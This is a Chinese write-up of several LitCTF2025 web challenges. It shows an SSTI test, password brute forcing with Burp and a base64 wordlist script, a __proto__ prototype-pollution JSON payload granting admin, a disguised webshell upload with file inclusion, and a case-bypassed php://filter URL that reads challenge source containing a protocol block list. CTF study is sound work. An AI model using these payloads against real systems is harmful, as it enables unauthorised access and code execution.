LitCTF2025 WEB

星愿信箱

使用的是python,那么大概率是ssti注入

测试{{5*5}}

发现需要包含文字,那么添加文字

可以看到被waf过滤了,直接抓包查看参数上fenjing

可以看到这里是json格式,其实fenjing也是支持json格式的

https://github.com/Marven11/Fenjing/blob/main/examples.md

nest_js

爆破密码

bp发送到intruder爆破

可以看到当密码是password的时候返回了一个token,那么登录进去看看

多重宇宙日记

描述:ez原型链,你能成为管理员拿到flag吗?

先注册一个账户这里然后登录进去

查看源码

构造原型链

复制代码
{
    "settings": {
        "theme": "ctf",
        "language": "ctf",
        "__proto__": {
            "isAdmin": true
        }
    }
}

然后点击管理员面板获取flag

easy_file

在输入账户密码登录的时候可以发现账户被加base64密了

所有这里爆破密码需要构造base64的密码

python 复制代码
import base64


def convert_passwords_to_base64(input_file, output_file):
    """
    逐行读取密码文件,转换为Base64并写入输出文件

    :param input_file: 输入密码文件路径
    :param output_file: 输出Base64文件路径
    """
    try:
        with open(input_file, 'r') as infile, open(output_file, 'w') as outfile:
            for line in infile:
                # 去除行尾换行符
                password = line.strip()
                if password:  # 忽略空行
                    # 将密码转换为bytes,然后Base64编码
                    password_bytes = password.encode('utf-8')
                    base64_bytes = base64.b64encode(password_bytes)
                    base64_str = base64_bytes.decode('utf-8')

                    # 写入输出文件
                    outfile.write(base64_str + '\n')

        print(f"成功转换密码并保存到 {output_file}")

    except FileNotFoundError:
        print(f"错误: 文件 {input_file} 不存在")
    except Exception as e:
        print(f"发生错误: {str(e)}")


if __name__ == "__main__":
    input_filename = "pwd.txt"  # 输入密码文件
    output_filename = "passwords_base64.txt"  # 输出Base64文件

    convert_passwords_to_base64(input_filename, output_filename)

这里使用python脚本把自己的密码字典转换成base64编码的

可以看到这里的cGFzc3dvcmQ的长度和其它的不一样密码应该就是这个base64解密

发现是可以登录的,admin,password

然后这里进行文件上传绕过发现死活绕不过。之后发现信息搜集不全

在主站源码里面有个提示。

有了file就知道上传一个一句话木马的jpg,然后利用file进行文件包含

easy_signin

使用dirsearch扫描网站目录知道存在login.html和api

访问login.html发现登录页面,然后进行爆破发现死活爆不出来,一直提示账户错误

换个思路,还有一个api文件夹访问不了。

查看登录页面的源码吧,发现一个api.js

存在一个传参点,试试php伪协议,这里过滤了php,可以使用大小写绕过

发现可以读取。那么读取一下api/sys/urlcode.php

http://node12.anna.nssctf.cn:25159/api/sys/urlcode.php?url=phP://filter/read=convert.base64-encode/resource=/var/www/html/api/sys/urlcode.php

python 复制代码
<?php
error_reporting(0);

function curl($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($ch);
    curl_close($ch);
}

$url = $_REQUEST['url'];
if($url){

    $forbidden_protocols = ['ftp://', 'php://', 'zlib://', 'data://', 'glob://', 'phar://', 'ssh2://', 'rar://', 'ogg://', 'expect://'];
    $protocol_block = false;
    foreach ($forbidden_protocols as $proto) {
        if (strpos($url, $proto) === 0) {  
            $protocol_block = true;
            break;
        }
    }
    $log_block = strpos($url, '.log') !== false;  
    
    if ($protocol_block) {
        echo "禁止访问:不允许使用 {$proto} 协议";
    } elseif ($log_block) {
        echo "禁止访问:URL 包含 .log";
    } elseif (strpos($url, 'login.php') !== false || strpos($url, 'dashboard.php') !== false || strpos($url, '327a6c4304ad5938eaf0efb6cc3e53dc.php') !== false) {
        echo "看不见哦";
    } else {
        echo "<b>".$url." 的快照如下:</b><br><br>";
        echo "<pre>";
        curl($url);
        include($url);
        echo "</pre>";
    }
}
?>

可以看到进行了过滤

flag应该在327a6c4304ad5938eaf0efb6cc3e53dc.php里面。访问一下看看

http://node6.anna.nssctf.cn:22089/327a6c4304ad5938eaf0efb6cc3e53dc.php

可以看到f'lag

君の名は

参考佬写的,很详细

https://www.cnblogs.com/Litsasuk/articles/18896993

相关推荐
小小小小宇2 小时前
虚拟列表兼容老DOM操作
前端
悦悦子a啊2 小时前
Python之--基本知识
开发语言·前端·python
安全系统学习3 小时前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
涛哥码咖4 小时前
chrome安装AXURE插件后无效
前端·chrome·axure
OEC小胖胖4 小时前
告别 undefined is not a function:TypeScript 前端开发优势与实践指南
前端·javascript·typescript·web
行云&流水4 小时前
Vue3 Lifecycle Hooks
前端·javascript·vue.js
Sally璐璐4 小时前
零基础学HTML和CSS:网页设计入门
前端·css
老虎06274 小时前
JavaWeb(苍穹外卖)--学习笔记04(前端:HTML,CSS,JavaScript)
前端·javascript·css·笔记·学习·html
灿灿121385 小时前
CSS 文字浮雕效果:巧用 text-shadow 实现 3D 立体文字
前端·css
烛阴5 小时前
Babel 完全上手指南:从零开始解锁现代 JavaScript 开发的超能力!
前端·javascript